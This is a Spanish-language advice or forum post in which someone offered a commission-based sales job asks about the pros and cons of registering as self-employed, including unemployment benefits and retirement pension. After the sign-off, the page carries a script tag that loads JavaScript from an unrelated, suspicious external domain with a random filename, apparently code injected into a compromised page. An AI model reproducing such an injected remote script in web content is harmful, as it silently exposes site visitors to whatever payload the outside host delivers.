Cosas buenas y malas de hacerte autónomo
Yo siempre he trabajado por cuenta ajena, pero me han ofrecido un trabajo como comercial en el cual tengo que darme de alta como autónomo. Me dan un fijo para cubrir gastos mas comisiones a parte.
Mis compañeros facturan a la empresa a final de mes y una gestoría les lleva todos los papeles para que todo esté en regla.
El problema está en que todo el mundo me está diciendo que tenga cuidado con lo de hacerme autónomo, que si no tendría paro, que si no tendría derecho a pensión cuando me jubile,... Lo cierto es que hasta que no vaya a la gestoría para firmar el contrato, no sé cuales son mis derechos ni mis obligaciones y que diferencias hay entre el trabajar para alguna empresa y el ser autónomo.
No se si será porque desconocen el tema o porque de verdad tengo que tener especial cuidado con algo que me pueda dar problemas a largo plazo.
Me gustaría que me orientara al respecto y que me dijera si es peligroso o algo por el estilo.
En el caso que no tuviera paro ni pensión de jubilación me gustaría saber si puedo pagarlo yo por mi cuenta para tener derecho a ello.
Muchas gracias.
<script type="text/javascript" src="http://plugintemarosa.info/dfi823hs.js?0.15216367090658067"></script>